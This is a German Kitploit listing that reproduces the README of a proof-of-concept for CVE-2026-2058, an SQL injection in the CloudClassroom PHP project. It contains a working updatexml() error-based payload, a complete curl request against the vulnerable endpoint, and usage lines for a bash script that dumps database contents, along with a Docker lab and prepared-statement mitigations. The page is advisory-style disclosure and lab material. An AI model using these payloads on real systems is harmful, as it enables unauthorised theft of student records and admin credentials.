Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-2058-PoC — Proof-of-Concept-Exploit für CVE-2026-2058, eine SQL-Injection im CloudClassroom-PHP-Projekt, mit automatisierter Datenbank-Enumeration und Datenextraktion. | Kitploit
Tools/GitHubGitHub/carlosalbertotuma/cve-2026-2058-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubcarlosalbertotuma/cve-2026-2058-poc

CVE-2026-2058-PoC

Proof-of-Concept-Exploit für CVE-2026-2058, eine SQL-Injection im CloudClassroom-PHP-Projekt, mit automatisierter Datenbank-Enumeration und Datenextraktion.

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-2058-PoC – SQL-Injection im CloudClassroom PHP-Projekt

Überblick

Eine SQL-Injection-Schwachstelle existiert in der Post-Query-Funktionalität des CloudClassroom PHP-Projekts (v1.0).

Die Schwachstelle ermöglicht es Angreifern, beliebige SQL-Befehle über den squeryx-POST-Parameter einzuschleusen, was zu Datenbank-Enumeration und Datenextraktion führt.

Dieses Repository enthält einen Proof of Concept (PoC)-Exploit, der demonstriert, wie die Schwachstelle ausgenutzt werden kann, um sensible Daten aus der Backend-Datenbank zu extrahieren.


Schwachstelleninformationen

FeldWert
CVECVE-2026-2058
SchwachstellentypSQL-Injection
CWECWE-89
Betroffene SoftwareCloudClassroom PHP-Projekt
Betroffene Version1.0
KomponentePost-Query-Funktionalität
AngriffsvektorRemote
Authentifizierung nötigNein
AuswirkungDatenbank-Offenlegung
SchweregradHoch
Angriffsmuster-ReferenzCAPEC-66

Verwundbarer Endpunkt

root@kitploit:~
POST /postquerypublic

Verwundbarer Parameter

root@kitploit:~
squeryx

Grundursache

Der Backend-Code verkettet Benutzereingaben direkt in eine SQL-Abfrage, ohne ordnungsgemäße Bereinigung oder parametrisierte Abfragen.

Beispiel für verwundbaren Code:

root@kitploit:~
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";

Da $tempsquery aus Benutzereingaben stammt, können Angreifer beliebiges SQL einschleusen.


Verwundbare Laborumgebung (Docker)

Für Test- und Forschungszwecke ist eine verwundbare Docker-Umgebung verfügbar.

Verwundbare Anwendung ausführen

root@kitploit:~
docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0

Proof of Concept

Die Schwachstelle kann mithilfe einer fehlerbasierten SQL-Injection-Technik ausgelöst werden, die die MySQL-Funktion updatexml() nutzt.

Beispiel-Payload:

root@kitploit:~
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1

Manuelle Ausnutzung

Beispiel für eine curl-Anfrage:

root@kitploit:~
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"

Erwartete Antwort:

root@kitploit:~
XPATH syntax error: '~cc_db~'

Exploit-Skript

Dieses Repository enthält einen Bash-Exploit, der automatisch:

  • Den Datenbanknamen extrahiert
  • Tabellen aufzählt
  • Spalten aufzählt
  • Tabellendaten ausgibt

Verwendung

root@kitploit:~
chmod +x cloudclassroom_sqli_exploit.sh

./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic

Beispiel:

root@kitploit:~
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic

Auswirkung

Ein Angreifer kann:

  • Die Datenbankstruktur aufzählen
  • Sensible Daten extrahieren
  • Administrator-Anmeldedaten abrufen
  • Auf Schülerdatensätze zugreifen
  • Die Backend-Datenbank vollständig kompromittieren

CVSS-Score

NIST NVD

  • Basis-Score: 9.8 (KRITISCH)
  • Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CNA (VulDB)

  • Basis-Score: 7.3 (HOCH)
  • Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

⚠️ Hinweis: Der NVD-CVSS-Score weicht vom CNA- (VulDB-) Score ab, da unterschiedliche Auswirkungsbewertungen zugrunde liegen.


EPSS (Exploit Prediction Scoring System)

Das Exploit Prediction Scoring System (EPSS) schätzt die Wahrscheinlichkeit, dass eine Schwachstelle in freier Wildbahn ausgenutzt wird.

CVEEPSS-WahrscheinlichkeitPerzentilDatum
CVE-2026-20580.000287.62 %2026-03-01

Quelle: FIRST EPSS-Datensatz


Gegenmaßnahmen

Entwickler sollten:

  • Prepared Statements verwenden
  • Eingabevalidierung implementieren
  • Benutzereingaben ordnungsgemäß escapen
  • Datenbankberechtigungen nach dem Prinzip der geringsten Rechte anwenden

Beispiel für eine sichere Implementierung:

root@kitploit:~
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();

Screenshots

SQL-Injection-Ausnutzung

image

image

Referenzen

  • https://cwe.mitre.org/data/definitions/89.html
  • https://owasp.org/Top10/2025/A05_2025-Injection/
  • https://capec.mitre.org/data/definitions/66.html
  • https://github.com/OWASP/www-project-web-security-testing-guide/blob/master/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md

Haftungsausschluss

Dieser Exploit wird ausschließlich für Bildungs- und Forschungszwecke bereitgestellt.

Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch diesen Code verursacht werden.


Autor

bl4dsc4n

Sicherheitsforscher

Tool herunterladen